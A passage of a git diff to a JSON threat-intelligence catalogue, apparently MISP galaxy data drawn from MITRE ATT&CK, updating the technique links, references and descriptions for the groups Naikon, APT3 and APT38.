"estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ 
@@ -6894,49 +8074,14 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6956,27 +8101,6 @@ ], "type": "uses" }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ 
@@ -6985,14 +8109,35 @@ "type": "uses" }, { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7006,7 +8151,7 @@ "type": "uses" }, { - "dest-uuid": "c4de7d83-e875-4c88-8b5d-06c41e5b7e79", + "dest-uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7020,14 +8165,14 @@ "type": "uses" }, { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7040,6 +8185,48 @@ ], "type": "uses" }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c4de7d83-e875-4c88-8b5d-06c41e5b7e79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ @@ -7047,6 +8234,27 @@ ], "type": "uses" }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ @@ -7117,13 +8325,6 @@ ] }, "related": [ - { - "dest-uuid": "c2417bab-3189-4d4d-9d60-96de2cdaf0ab", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", "tags": [ 
@@ -7131,6 +8332,13 @@ ], "type": "uses" }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ @@ -7138,6 +8346,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c11ac61d-50f4-444f-85d8-6f006067f0de", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "bba595da-b73a-4354-aa6c-224d4de7cb4e", "tags": [ @@ -7152,6 +8367,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c2417bab-3189-4d4d-9d60-96de2cdaf0ab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", "tags": [ @@ -7159,20 +8381,6 @@ ], "type": "uses" }, - { - "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -7181,7 +8389,7 @@ "type": "uses" }, { - "dest-uuid": "c11ac61d-50f4-444f-85d8-6f006067f0de", + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7197,7 +8405,7 @@ "external_id": "G0019", "refs": [ "https://attack.mitre.org/groups/G0019", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf", "http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf", "https://securelist.com/the-naikon-apt/69953/" ], 
@@ -7242,7 +8450,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7262,6 +8470,20 @@ ], "type": "uses" }, + { + "dest-uuid": "7f8730af-f683-423f-9ee1-5f6875a80481", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "22addc7b-b39f-483d-979a-1b35147da5de", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8c553311-0baa-4146-997a-f79acef3d831", "tags": [ @@ -7269,20 +8491,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "2fb26586-2b53-4b9a-ad4f-2b3bcb9a2421", "tags": [ @@ -7297,13 +8505,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7f8730af-f683-423f-9ee1-5f6875a80481", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "007b44b6-e4c5-480b-b5b9-56f2081b1b7b", "tags": [ 
@@ -7311,43 +8512,50 @@ ], "type": "uses" }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "22addc7b-b39f-483d-979a-1b35147da5de", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "2a158b0a-7ef8-43cb-9985-bf34d1e12050", "value": "Naikon - G0019" }, { - "description": "[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security. (Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. (Citation: FireEye Clandestine Wolf) (Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. (Citation: Symantec Buckeye)\n\nAPT3 Adversary Emulation Plan - (Citation: APT3 Adversary Emulation Plan)", + "description": "[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security. 
(Citation: FireEye Clandestine Wolf) (Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. (Citation: FireEye Clandestine Wolf) (Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. (Citation: Symantec Buckeye)\n\nMITRE has also developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)", "meta": { "external_id": "G0022", "refs": [ "https://attack.mitre.org/groups/G0022", "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html", - "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", - "http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html", - "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", "https://www.recordedfuture.com/chinese-mss-behind-apt3/", - "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf" + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html" ], "synonyms": [ "APT3", 
@@ -7374,69 +8582,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a6525aec-acc4-47fe-92f9-b9b4de4b9228", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4e6b9625-bbda-4d96-a652-b3bb45453f26", "tags": [ 
@@ -7444,34 +8589,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ @@ -7479,48 +8596,6 @@ ], "type": "uses" }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "58adaaa8-f1e8-4606-9a08-422e568461eb", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ 
@@ -7529,28 +8604,35 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7563,13 +8645,6 @@ ], "type": "uses" }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c9703cd3-141c-43a0-a926-380082be5d04", "tags": [ 
@@ -7578,56 +8653,49 @@ "type": "uses" }, { - "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "a6525aec-acc4-47fe-92f9-b9b4de4b9228", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7640,6 +8708,13 @@ ], "type": "uses" }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ 
@@ -7648,7 +8723,49 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7662,21 +8779,7 @@ "type": "uses" }, { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7696,17 +8799,295 @@ ], "type": "uses" }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "f6d1d2cb-12f5-4221-9636-44606ea1f3f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "58adaaa8-f1e8-4606-9a08-422e568461eb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + 
}, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0bbdf25b-30ff-4894-a1cd-49260d0dd2d9", "value": "APT3 - G0022" }, + { + "description": "[APT38](https://attack.mitre.org/groups/G0082) is a financially-motivated threat group that is backed by the North Korean regime. The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014.(Citation: FireEye APT38 Oct 2018)\n\nNorth Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. 
Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.", + "meta": { + "external_id": "G0082", + "refs": [ + "https://attack.mitre.org/groups/G0082", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securelist.com/lazarus-under-the-hood/77908/" + ], + "synonyms": [ + "APT38" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1f47e2fd-fa77-4f2f-88ee-e85df308f125", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "53ab35c2-d00e-491a-8753-41d35ae7e547", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc1e737c-236c-4e3b-83ba-32039a626ef8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
